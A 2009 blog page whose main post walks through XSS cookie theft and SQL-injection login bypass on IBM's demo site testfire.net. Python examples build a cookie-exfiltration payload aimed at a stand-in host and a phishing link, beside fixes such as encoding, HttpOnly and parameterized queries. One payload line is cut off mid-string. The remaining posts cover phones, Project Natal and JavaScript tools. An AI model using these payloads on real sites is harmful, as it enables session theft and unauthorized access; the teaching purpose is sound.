Thursday, June 11, 2009

Web application security flaws exposed

Today I participated in the "Hacking 101" event hosted by IBM in Miami. It was a half-day seminar with a hands-on lab. Very interesting and useful, I must admit. They talked about the top security issues of web applications today, based on the OWASP Top 10 document. The interesting part is that they actually demonstrated some of the security issues discussed. In order to showcase everything, they have a test (fictitious) web site set up, namely http://www.testfire.net/ (you can access it from your own station at will). Let me go through some of the vulnerabilities covered during the session.


Cross-Site Scripting (XSS) - Number 1 in the Top 10 list.

XSS is basically a flaw where untrusted input (here, a search term) is embedded, unencoded, into the HTML returned by a trusted site, so the victim's browser runs the attacker's script with that site's origin. One of the implications is that session tokens can be stolen. Let's see how:

First I search for the string 'Mihai', which will change the browser URL to http://www.testfire.net/search.aspx?txtSearch=mihai, printing the result like shown below:



The next step is to change the query string to http://www.testfire.net/search.aspx?txtSearch=<script>alert(document.cookie)</script>, which pops up an alert showing information related to your session:


So the cookie is available to JavaScript. How do we exploit this? First, you need the Tamper Data Firefox add-on. Once you have it installed, open it by choosing Tools -> Tamper Data. Back in Firefox, in the search text box enter %3Cscript%3Edocument.write('. Looking in the Tamper Data UI, you can locate the request just made to evilsite and see that your cookie has been sent to it.


To exploit this vulnerability, one can send the user an email with a link that has the above script embedded in it. Once the user clicks on it, the request is sent to www.testfire.net with the script as the value of the search text box. Because the application echoes the search term back without encoding it, the browser executes the script and the user's cookie is sent to evilsite. The fix is to HTML-encode the term before it is written into the page; marking the session cookie HttpOnly additionally keeps document.cookie from reading it, although that does not stop other abuses of the injected script.
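To make the reflection concrete, here is an added example (my own code, not the post's and not testfire.net's) that models the search page in Python: the vulnerable rendering, the encoded rendering, a cookie-stealing payload of the kind the post describes (the post's own payload is cut off above, so this one is my construction), the phishing link built from it, and the HttpOnly check. The host evilsite.example, the cookie name and the page layout are assumptions for the demo.

```python
# Added example: a model of the reflected-XSS search page, not testfire.net's code.
# Host name, cookie name and payload below are constructed for the demo.
import html
import re
from urllib.parse import urlencode

ATTACKER_HOST = "evilsite.example"   # constructed stand-in for the post's "evilsite"
SEARCH_PAGE = "http://www.testfire.net/search.aspx"


def render_search_vulnerable(term: str) -> str:
    """The flaw: the search term is echoed into the HTML exactly as received."""
    return "<html><body><p>Search results for " + term + "</p></body></html>"


def render_search_fixed(term: str) -> str:
    """The fix: HTML-encode untrusted text before inserting it into the page."""
    return ("<html><body><p>Search results for "
            + html.escape(term, quote=True) + "</p></body></html>")


def cookie_exfil_payload() -> str:
    """A payload of the kind the post describes (its own is cut off): once echoed,
    the browser writes an <img> whose URL carries document.cookie to the attacker's
    host, so the cookie lands in the attacker's web server log."""
    return ("<script>document.write('<img src=\"http://" + ATTACKER_HOST
            + "/c?'+document.cookie+'\">')</script>")


def phishing_link(payload: str) -> str:
    """The link mailed to the victim: the payload URL-encoded into txtSearch."""
    return SEARCH_PAGE + "?" + urlencode({"txtSearch": payload})


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def page_runs_script(page: str) -> bool:
    """Rough stand-in for the browser: does the response contain a live <script> tag?
    An encoded &lt;script&gt; is just text and does not match."""
    return _SCRIPT_TAG.search(page) is not None


def cookie_readable_by_script(set_cookie_header: str) -> bool:
    """Whether document.cookie can read this cookie: not if it was set with HttpOnly."""
    attributes = [part.strip().lower() for part in set_cookie_header.split(";")[1:]]
    return "httponly" not in attributes


if __name__ == "__main__":
    probe = "<script>alert(document.cookie)</script>"
    print("vulnerable page runs probe:", page_runs_script(render_search_vulnerable(probe)))
    print("fixed page runs probe:     ", page_runs_script(render_search_fixed(probe)))
    print("link to mail the victim:   ", phishing_link(cookie_exfil_payload()))
    # "ASP.NET_SessionId" is a constructed cookie name for the demo.
    print("HttpOnly cookie readable:  ",
          cookie_readable_by_script("ASP.NET_SessionId=abc123; path=/; HttpOnly"))
```

Running it shows the vulnerable rendering still contains a live script element while the encoded one does not, which is exactly the difference between the two pages the seminar demonstrated.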


SQL Injection - Number 2 in Top 10 list.

With SQL injection, the user input is embedded directly into a SQL statement, so the input can change the meaning of the statement. One of the implications is that we can access data in the database, or, as here, bypass authentication. Let's say we want to log in as administrator on our dummy web site. The first step is to get a sense of how the SQL statement is formed. For that, we enter a single quote (') as the user name, followed by anything as the password:


The result of trying to log in is an error page that displays how the SQL statement involving the user name and password is constructed (echoing the database exception to the user is a flaw in its own right, since it hands the attacker the shape of the query):


Once we know what the query looks like, we can enter the text ' or 1=1-- in the user name field. The quote closes the string literal, or 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the statement, including the password check:


with the result that we are signed in as admin. The fix is to use parameterized queries, so that user input is bound as data and can never alter the statement, and to stop showing database errors to users:
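The whole sequence, the single-quote probe, the ' or 1=1-- bypass and the parameterized fix, as an added example in Python with an in-memory SQLite database (my own code, not the demo site's; the users table, its two accounts and their passwords are constructed for the example):

```python
# Added example: a model of the login form's SQL handling, not testfire.net's code.
# The table and accounts are constructed for the demo.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
               [("admin", "s3cret"), ("mihai", "hunter2")])


def build_query_vulnerable(username: str, password: str) -> str:
    """The flaw: the two form fields are concatenated into the SQL text."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(username: str, password: str):
    """Returns the matched user name or None; lets database errors propagate.
    With username "' or 1=1--" the WHERE clause becomes
    username = '' or 1=1 and the password check is commented out."""
    row = db.execute(build_query_vulnerable(username, password)).fetchone()
    return row[0] if row else None


def probe_error(username: str, password: str = "anything"):
    """The single-quote probe: when the application shows exceptions to the user,
    this is the text the error page leaks. Returns None when the query is valid."""
    try:
        login_vulnerable(username, password)
    except sqlite3.OperationalError as exc:
        return str(exc) + " in: " + build_query_vulnerable(username, password)
    return None


def login_fixed(username: str, password: str):
    """The fix: a parameterized query binds the input as data, so a quote,
    'or 1=1' or '--' inside a field can never change the statement."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print("probe leaks:", probe_error("'"))
    print("vulnerable login:", login_vulnerable("' or 1=1--", "anything"))
    print("fixed login:     ", login_fixed("' or 1=1--", "anything"))
```

The vulnerable path returns the first row of the users table, which here is admin, just as in the demo; the same input against the parameterized query simply fails to match any user.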



Of course, IBM has a tool called AppScan that can help detect all the vulnerabilities mentioned in this post. In a nutshell, it works by scanning your web application (i.e. the website), identifying security issues according to a set of test policies, pointing out the problems, logging the issues, and recommending fixes. Below is a screenshot of AppScan in action (taken from the PDF presentation slides):


If you want to find out more about the event, get the slides, or try everything out, go to http://www.ibm.com/developerworks/offers/techbriefings/details/hacking.html.

All in all, a very informative session!

Friday, June 5, 2009

Top 5 smartphones for Q1 2009

I was writing in one of my May posts about the most popular handsets in the U.S. at the end of 2008; new data came out (I read about it via cenriqueortiz) regarding the top 5 smartphones sold in Q1 2009:
1. BlackBerry Curve
2. Apple iPhone 3G
3. BlackBerry Storm
4. BlackBerry Pearl
5. T-Mobile G1

Am glad to see the G1 up there. By the end of 2009, I predict it will move up to 4th or 3rd place.

Tuesday, June 2, 2009

And the winner is ... Xbox 360

If you haven't heard about "Project Natal", don't feel bad, you have now! It is a body motion capture system for the Xbox 360. No controller is required (a direct shot at the Wii): a 'box' captures motion, sound and 3D movement for multiple users during one game session, and offers facial recognition, used for example to sign you in to Xbox Live. The release date has not been officially announced, but it is expected some time later this year (Christmas maybe?). I am curious about the cost of Natal. We should not forget that the Wii has a lower price than the Xbox 360 and the PS3. I guess we'll find out sooner or later.

All the tools you need to work with JavaScript

There is a JavaWorld article titled Ajax: Tools of the trade, which consists of a survey of tools for the JavaScript developer.

The article starts by mentioning the JavaScript support offered by popular IDEs such as NetBeans, IntelliJ, and Eclipse. It continues by describing tools such as Firebug (lets you edit, debug, and monitor JavaScript on the fly), YSlow (analyzes web pages and suggests ways to improve performance), and Hammerhead (measures the load time of web pages).

The next part of the article goes into ways of testing your JavaScript code, using tools and frameworks such as JsUnit (a unit testing framework for JavaScript), JSSpec (behavior-driven: one or more specs describe the expected behavior), YUI Test (a testing framework for JavaScript), and Crosscheck (checks whether your code runs in many different browsers).

If you are interested in testing your user interface, the article mentions some of the tools available, such as Selenium (set of tools that supports rapid development of test automation for web-based applications), Watir (an open-source library for automating web browsers), and YUI Test mentioned above which can also be used to simulate the DOM and user interaction.

Other utility tools for JavaScript include JSLint (a JavaScript code quality tool) and, for minifying your JavaScript, JSMin (removes comments and unnecessary whitespace from JavaScript files) and YUI Compressor (in addition to removing comments and whitespace, it also obfuscates local variables using the smallest possible variable names).

Since I have just started with JavaScript, I cannot make any recommendations. Try them out, see which one fits your project best, and use it.